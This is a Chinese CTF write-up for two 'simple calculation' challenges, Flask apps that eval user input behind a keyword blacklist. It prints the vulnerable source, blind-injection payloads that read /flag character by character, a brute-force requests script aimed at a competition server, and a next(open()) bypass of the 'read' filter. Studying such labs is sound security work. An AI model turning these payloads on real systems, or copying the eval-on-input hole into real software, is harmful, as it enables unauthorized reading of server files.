简单的计算题1

源代码

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request,session
from config import black_list,create
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)

## flag is in /flag try to get it

@app.route('/', methods=['GET', 'POST'])
def index():

    def filter(string):
        for black_word in black_list:
            if black_word in string:
                return "hack"
        return string

    if request.method == 'POST':
        input = request.form['input']
        create_question = create()
        input_question = session.get('question')
        session['question'] = create_question
        if input_question==None:
            return render_template('index.html', answer="Invalid session please try again!", question=create_question)
        if filter(input)=="hack":
            return render_template('index.html', answer="hack", question=create_question)
        try:
            calc_result = str((eval(input_question + "=" + str(input))))
            if calc_result == 'True':
                result = "Congratulations"
            elif calc_result == 'False':
                result = "Error"
            else:
                result = "Invalid"
        except:
            result = "Invalid"
        return render_template('index.html', answer=result,question=create_question)

    if request.method == 'GET':
        create_question = create()
        session['question'] = create_question
        return render_template('index.html',question=create_question)

@app.route('/source')
def source():
        return open("app.py", "r").read()

if __name__ == '__main__':
    app.run(host="0.0.0.0", debug=False)

解题步骤

审计代码可知后台是根据eval(input_question + "=" + str(input))返回的结果进行判断,只过滤了or,知道flag的位置,可以通过“布尔盲注”来读取flag,
构造payload:answer and 'x'==open('/flag','r').read()[0:1]
读取flag的第一个字符与x比较,如果相等,那么前后都为真,返回True,不相等返回False
需要注意的是,每次请求服务器都会返回一个不同的session,回答问题需要携带这个cookie,所以写脚本需要注意一下cookie,可以将返回的cookie取出来,也可以直接用requests.session(),就不用格外管cookie了。

解题脚本

import requests

burp1_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://183.129.189.60:10026", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://183.129.189.60:10026/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh-HK;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6", "Connection": "close"}
burp1_cookie = {}
burp1_data = {"input": "7524725"}

burp0_url = "http://183.129.189.60:10026/"
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh-HK;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6", "Connection": "close"}
responses = requests.get(burp0_url, headers=burp0_headers)
burp1_cookie = responses.cookies.get_dict()
burp1_data['input'] = str(eval(responses.text.split('<h4>')[1].split('=</h4>')[0]))
burp1_data['input'] += ' and "{}"==open("/flag","r").read()[{}:{}]'.format(chr(0),str(0),str(0+1))
# responses = session.post(burp0_url, headers=burp1_headers, data=burp1_data)
flag = ''
for i in range(0,50):
    for j in range(33,128):
        while True:
            try:
                responses = requests.post(burp0_url, headers=burp1_headers, data=burp1_data, cookies=burp1_cookie)
                burp1_cookie = responses.cookies.get_dict()
                burp1_data['input'] = str(eval(responses.text.split('<h4>')[1].split('=</h4>')[0]))
                burp1_data['input'] += ' and "{}"==open("/flag","r").read()[{}:{}]'.format(chr(j),str(i),str(i+1))
                if 'Congratulations' in responses.text:
                    flag += chr(j-1)
                    print(flag)
                    break
                if 'Error' in responses.text:
                    break
            except Exception as e:
                pass

简单的计算题2

源代码

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request,session
from config import black_list,create
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)

## flag is in /flag try to get it

@app.route('/', methods=['GET', 'POST'])
def index():

    def filter(string):
        for black_word in black_list:
            if black_word in string:
                return "hack"
        return string

    if request.method == 'POST':
        input = request.form['input']
        create_question = create()
        input_question = session.get('question')
        session['question'] = create_question
        if input_question == None:
            return render_template('index.html', answer="Invalid session please try again!", question=create_question)
        if filter(input)=="hack":
            return render_template('index.html', answer="hack", question=create_question)
        calc_str = input_question + "=" + str(input)
        try:
            calc_result = str((eval(calc_str)))
        except Exception as ex:
            calc_result = "Invalid"
        return render_template('index.html', answer=calc_result,question=create_question)

    if request.method == 'GET':
        create_question = create()
        session['question'] = create_question
        return render_template('index.html',question=create_question)

@app.route('/source')
def source():
        return open("app.py", "r").read()

if __name__ == '__main__':
    app.run(host="0.0.0.0", debug=False)

解题步骤

和第一个差不多,只是过滤的东西更多了,最重要的是read给过滤了,这怎么办,难道不能用open了?
百度了一下python读文件的方法,看到可以用for来一行一行的读文件

f = open('/flag','r')
for x in f:
    print(f)

原来open()返回的是个迭代器,那么就可以写成下面这样

next(open('/flag','r'))

这样就读出来了第一行,没过滤next,这就跟前面一样了,稍微改一下代码就可以。这是不是非预期了?!

最后修改:2020 年 06 月 27 日 10 : 08 AM